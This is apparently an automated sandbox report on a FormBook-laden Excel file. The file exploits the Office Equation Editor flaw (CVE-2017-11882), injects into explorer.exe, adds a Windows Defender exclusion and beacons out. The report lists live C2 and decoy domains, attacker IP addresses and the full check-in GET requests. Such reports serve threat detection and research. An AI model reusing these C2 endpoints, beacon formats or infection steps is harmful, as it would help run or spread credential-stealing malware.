Windows Analysis Report
Deposit_Receipt.xlsx

Overview

General Information

Sample Name:	Deposit_Receipt.xlsx
Analysis ID:	562482
MD5:	d77e93cda67d80b16f3522bd1a8d1d47
SHA1:	36bcfe090cdb8e46eebea0b32f82f7d94d6a071b
SHA256:	6cceb976e0d0be07b25183e8f862680e5cb39d39142ab1f94c6ec29cf44ffd4f
Tags:	FormbookVelvetSweatshopxlsx
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

Sigma detected: Droppers Exploiting CVE-2017-11882

System process connects to network (likely due to code injection or exploit)

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Suspicius Add Task From User AppData Temp

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Sigma detected: Execution from Suspicious Folder

Sigma detected: Powershell Defender Exclusion

.NET source code contains method to dynamically call methods (often used by packers)

Office equation editor drops PE file

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Adds a directory exclusion to Windows Defender

Drops PE files to the user root directory

Sigma detected: Suspicious Rundll32 Without Any CommandLine Params

Uses schtasks.exe or at.exe to add and modify task schedules

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Checks if the current process is being debugged

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Signatures

AV Detection

Found malware configuration

Source: 00000009.00000002.533651409.00000000000F0000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.eagle-meter.com/nt3f/"], "decoy": ["tricyclee.com", "kxsw999.com", "wisteria-pavilion.com", "bellaclancy.com", "promissioskincare.com", "hzy001.xyz", "checkouthomehd.com", "soladere.com", "point4sales.com", "socalmafia.com", "libertadysarmiento.online", "nftthirty.com", "digitalgoldcryptostock.net", "tulekiloscaird.com", "austinfishandchicken.com", "wlxxch.com", "mgav51.xyz", "landbanking.global", "saprove.com", "babyfaces.skin", "elainemaxwellcoaching.com", "1388xc.com", "juveniscloud.com", "bsauksjon.com", "the-waterkooler.com", "comment-changer-sa-vie.com", "psmcnd.top", "rhodesleadingedge.com", "mccuelawfirm.com", "skinnscience.club", "hype-clicks.com", "liaojinc.xyz", "okmakers.com", "ramblertour.online", "wickedhunterworld.com", "fit-threads.com", "cookidoo.website", "magentabin.com", "pynch1.com", "best-paper-to-know-today.info", "allmight.net", "monicraftsprintables.com", "avataroasis.com", "10dian-4.com", "cozastore.net", "capitalcased.com", "spacezanome.xyz", "feiyangmi.com", "11opus.com", "getinteriorsolution.com", "tidyhutstore.com", "amazingpomskyfamily.com", "tfcvintage.com", "halfanape.com", "rotakb.com", "martinasfood.com", "the-thanks.com", "mithilmehta.com", "em-photo.art", "primerepro.com", "lankasirinspa.com", "gtbaibang.com", "zealandiatobacco.com", "deepikatransportpackers.com"]}

Multi AV Scanner detection for submitted file

Source: Deposit_Receipt.xlsx	Virustotal: Detection: 37%			Perma Link
Source: Deposit_Receipt.xlsx	ReversingLabs: Detection: 46%

Yara detected FormBook

Source: Yara match	File source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.33959a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.333ed80.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.533651409.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.493228675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.493954054.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.533831513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.680092656.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.525819283.00000000097A6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.513806035.00000000097A6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.680132856.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.680038581.00000000000D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.533708432.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.496236339.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: www.eagle-meter.com/nt3f/	Avira URL Cloud: Label: malware
Source: http://www.eagle-meter.com/nt3f/?4hfxh=nOM9fgGIZ+TfVsUq2Sm955WWmPaXUcfoEc+b9olF9adUCvzkQycvr3NYcYX3ACxTInTmwA==&1bNHY2=e6AHDh_0Bf6p6lIp	Avira URL Cloud: Label: malware
Source: http://www.getinteriorsolution.com/nt3f/?4hfxh=VPDo/gGljWIAkXRpnf2851ahKkwJgNah2gT2Xhg3gSLEGk9Hcz2Z/bSczfFocrENcd4Lnw==&1bNHY2=e6AHDh_0Bf6p6lIp	Avira URL Cloud: Label: malware
Source: http://www.the-thanks.com/nt3f/?4hfxh=JbDy7TRIU32tRRiWfFaEbpGMnCQxB75OBjVGZWj4WfhFoU9oPzFDuRetfANWR0lEorWalg==&1bNHY2=e6AHDh_0Bf6p6lIp	Avira URL Cloud: Label: malware

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ubRPPGAHBbheAf.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 9.2.vbc.exe.986380.3.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 9.2.vbc.exe.30000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 9.0.vbc.exe.400000.10.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.vbc.exe.400000.6.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.vbc.exe.400000.8.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.vbc.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: ManifestRunn.pdb source: vbc.exe
Source:	Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000009.00000002.534035519.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.494281246.0000000000590000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.534289811.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.495389959.00000000007C0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe
Source:	Binary string: rundll32.pdb source: vbc.exe, 00000009.00000002.534004799.0000000000979000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.533634286.0000000000030000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: ManifestRunn.pdbXJ source: vbc.exe, 00000004.00000002.497350291.0000000005220000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 27.0.236.139:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 27.0.236.139:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 27.0.236.139:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49174 -> 162.241.169.207:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49174 -> 162.241.169.207:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49174 -> 162.241.169.207:80

Source: C:\Windows\explorer.exe	Network Connect: 162.241.169.207 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.eagle-meter.com
Source: C:\Windows\explorer.exe	Network Connect: 27.0.236.139 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 200.58.101.200 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 147.255.135.250 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.saprove.com
Source: C:\Windows\explorer.exe	Domain query: www.the-thanks.com
Source: C:\Windows\explorer.exe	Network Connect: 37.187.180.144 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.libertadysarmiento.online
Source: C:\Windows\explorer.exe	Domain query: www.getinteriorsolution.com
Source: C:\Windows\explorer.exe	Domain query: www.primerepro.com

Source: global traffic	HTTP traffic detected: GET /nt3f/?1bNHY2=e6AHDh_0Bf6p6lIp&4hfxh=zh9ZJvQDpuJ8FzfOF5/13POSojXlenAN5Q6v9e/Np9zFVZ+T+GW/a5eB04ukDkIff9AcOQ== HTTP/1.1Host: www.primerepro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nt3f/?4hfxh=nOM9fgGIZ+TfVsUq2Sm955WWmPaXUcfoEc+b9olF9adUCvzkQycvr3NYcYX3ACxTInTmwA==&1bNHY2=e6AHDh_0Bf6p6lIp HTTP/1.1Host: www.eagle-meter.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nt3f/?1bNHY2=e6AHDh_0Bf6p6lIp&4hfxh=roQyhHJwfVxU2zOZOCh4/5oE96lXlhEDqwlN10SvmnnZcGUgQE2W+6Ro0cAGYyc6bdur0A== HTTP/1.1Host: www.saprove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nt3f/?4hfxh=JbDy7TRIU32tRRiWfFaEbpGMnCQxB75OBjVGZWj4WfhFoU9oPzFDuRetfANWR0lEorWalg==&1bNHY2=e6AHDh_0Bf6p6lIp HTTP/1.1Host: www.the-thanks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nt3f/?1bNHY2=e6AHDh_0Bf6p6lIp&4hfxh=XQiqgSh3QMW0nePllWUsxZUxyZ7Wg3kP4uBvWEaTkPp74lNhmE95Km3+29PmuNVvDyLfVA== HTTP/1.1Host: www.libertadysarmiento.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nt3f/?4hfxh=VPDo/gGljWIAkXRpnf2851ahKkwJgNah2gT2Xhg3gSLEGk9Hcz2Z/bSczfFocrENcd4Lnw==&1bNHY2=e6AHDh_0Bf6p6lIp HTTP/1.1Host: www.getinteriorsolution.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 28 Jan 2022 21:42:56 GMTContent-Type: text/htmlContent-Length: 275ETag: "61f22041-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Jan 2022 21:43:13 GMTContent-Type: text/htmlContent-Length: 1823Connection: closeVary: Accept-EncodingLast-Modified: Mon, 24 Jan 2022 05:36:19 GMTETag: "71f-5d64d59161ac0"Accept-Ranges: bytesData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 6f 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 49 53 54 4f 52 59 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 2f 74 31 2e 64 61 75 6d 63 64 6e 2e 6e 65 74 2f 74 69 73 74 6f 72 79 5f 61 64 6d 69 6e 2f 77 77 77 2f 73 74 79 6c 65 2f 74 6f 70 2f 66 6f 6e 74 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 2f 74 31 2e 64 61 75 6d 63 64 6e 2e 6e 65 74 2f 74 69 73 74 6f 72 79 5f 61 64 6d 69 6e 2f 77 77 77 2f 73 74 79 6c 65 2f 74 6f 70 2f 65 72 72 6f 72 5f 32 30 31 39 30 38 31 34 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6b 61 6b 61 6f 49 6e 64 65 78 22 3e 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 6b 61 6b 61 6f 42 6f 64 79 22 3e eb b3 b8 eb ac b8 20 eb b0 94 eb a1 9c ea b0 80 ea b8 b0 3c 2f 61 3e 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 6b 61 6b 61 6f 47 6e 62 22 3e eb a9 94 eb 89 b4 20 eb b0 94 eb a1 9c ea b0 80 ea b8 b0 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 6b 61 6b 61 6f 57 72 61 70 22 20 63 6c 61 73 73 3d 22 74 69 73 74 6f 72 79 5f 74 79 70 65 33 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6b 61 6b 61 6f 43 6f 6e 74 65 6e 74 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 4d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6d 41 72 74 69 63 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 5f 65 72 72 6f 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 6e 65 72 5f 65 72 72 6f 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 5f 74 69 73 74 6f 72 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 69 64 3d 22 6b 61 6b 61 6f 42 6f 64 79 22 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Jan 2022 21:43:25 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 13 Jul 2021 15:25:30 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 35 36 34 35 56 36 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9PO5645V6";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8
Source: unknown	TCP traffic detected without corresponding DNS query: 65.2.143.8

Source: vbc.exe, 00000004.00000002.495847744.00000000021F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://blog.iandreev.com
Source: vbc.exe, 00000004.00000002.495847744.00000000021F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://blog.iandreev.com/
Source: explorer.exe, 0000000A.00000000.554693627.0000000004650000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 0000000A.00000000.516613622.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 0000000A.00000000.516613622.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 0000000A.00000000.514429038.0000000000255000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 0000000A.00000000.551802023.0000000002CC7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 0000000A.00000000.551802023.0000000002CC7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000002.495847744.00000000021F1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.495951937.0000000002280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000A.00000000.501593907.0000000003E50000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 0000000A.00000000.551802023.0000000002CC7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 0000000A.00000000.554693627.0000000004650000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000000A.00000000.554693627.0000000004650000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
